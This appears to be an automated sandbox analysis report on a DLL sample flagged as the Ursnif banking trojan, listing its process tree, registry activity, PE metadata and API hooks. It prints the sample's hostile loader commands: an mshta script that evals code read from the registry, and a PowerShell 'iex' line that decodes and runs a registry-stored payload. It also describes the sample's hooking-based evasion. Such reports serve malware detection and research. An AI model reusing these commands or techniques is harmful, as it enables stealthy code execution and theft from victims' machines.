          Source: NJPcHPuRcG.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.bank.troj.spyw.evad.winDLL@36/159@18/3
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_027731DD CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,
          Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{75BD31D2-7017-11EB-90E5-ECF4BB570DC9}.datJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{8AE918E3-61CB-4CED-3B5E-25409F722974}
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5148:120:WilError_01
          Source: C:\Windows\SysWOW64\regsvr32.exeMutant created: \Sessions\1\BaseNamedObjects\{F653DE64-DD3A-98FE-178A-614C3B5E2540}
          Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DFD1DF0FD1C3CEAF12.TMPJump to behavior
          Source: NJPcHPuRcG.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
          Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
          Source: NJPcHPuRcG.dllVirustotal: Detection: 15%
          Source: regsvr32.exeString found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
          Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\NJPcHPuRcG.dll'
          Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\NJPcHPuRcG.dll
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
          Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
          Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17410 /prefetch:2
          Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:82962 /prefetch:2
          Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17422 /prefetch:2
          Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17430 /prefetch:2
          Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline'
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES78AB.tmp' 'c:\Users\user\AppData\Local\Temp\mu1rnx1a\CSC6647FE8FE542539CE2919E5B6D2D1D.TMP'
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.cmdline'
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8CA0.tmp' 'c:\Users\user\AppData\Local\Temp\yacmzdf3\CSCE6DA2C7C1B814D8F891E10CFF0A5BBCE.TMP'
          Source: unknownProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
          Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\NJPcHPuRcG.dll
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
          Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17410 /prefetch:2
          Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:82962 /prefetch:2
          Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17422 /prefetch:2
          Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17430 /prefetch:2
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.cmdline'
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES78AB.tmp' 'c:\Users\user\AppData\Local\Temp\mu1rnx1a\CSC6647FE8FE542539CE2919E5B6D2D1D.TMP'
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8CA0.tmp' 'c:\Users\user\AppData\Local\Temp\yacmzdf3\CSCE6DA2C7C1B814D8F891E10CFF0A5BBCE.TMP'
          Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
          Source: C:\Windows\explorer.exeProcess created: unknown unknown
          Source: C:\Windows\explorer.exeProcess created: unknown unknown
          Source: C:\Windows\explorer.exeProcess created: unknown unknown
          Source: C:\Windows\explorer.exeProcess created: unknown unknown
          Source: C:\Windows\explorer.exeProcess created: unknown unknown
          Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
          Source: C:\Windows\explorer.exeFile opened: C:\Windows\SYSTEM32\msftedit.dll
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
          Source: NJPcHPuRcG.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: NJPcHPuRcG.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: NJPcHPuRcG.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: NJPcHPuRcG.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: NJPcHPuRcG.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: NJPcHPuRcG.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: NJPcHPuRcG.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001B.00000002.386301089.000001BF2C130000.00000002.00000001.sdmp, csc.exe, 0000001E.00000002.395773551.0000021C02EB0000.00000002.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000024.00000000.426711747.0000000006FE0000.00000002.00000001.sdmp
          Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000002.00000003.399265085.0000000005970000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: explorer.exe, 00000024.00000003.471981638.0000000006C40000.00000004.00000001.sdmp
          Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000002.00000003.399265085.0000000005970000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: explorer.exe, 00000024.00000003.471981638.0000000006C40000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000024.00000000.426711747.0000000006FE0000.00000002.00000001.sdmp
          Source: NJPcHPuRcG.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: NJPcHPuRcG.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: NJPcHPuRcG.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: NJPcHPuRcG.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: NJPcHPuRcG.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

          Data Obfuscation:

          barindex
          Suspicious powershell command line foundShow sources
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline'
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.cmdline'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.cmdline'
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_0542556E LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\NJPcHPuRcG.dll
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_0277AF23 push ecx; ret
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_0277ABF0 push ecx; ret
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_0542769F push ecx; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 6.87914884899
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.dll

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Yara detected UrsnifShow sources
          Source: Yara matchFile source: 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.328188279.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.328320558.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.328226726.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.328337032.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.328359150.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.328350143.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.328266588.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.328300905.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.336044765.0000000004DBB000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6448, type: MEMORY
          Hooks registry keys query functions (used to hide registry keys)Show sources
          Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
          Modifies the export address table of user mode modules (user mode EAT hooks)Show sources
          Source: explorer.exeIAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFA9B33521C
          Modifies the import address table of user mode modules (user mode IAT hooks)Show sources
          Source: explorer.exeEAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFA9B335200
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
          Source: C:\Windows\SysWOW64\regsvr32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
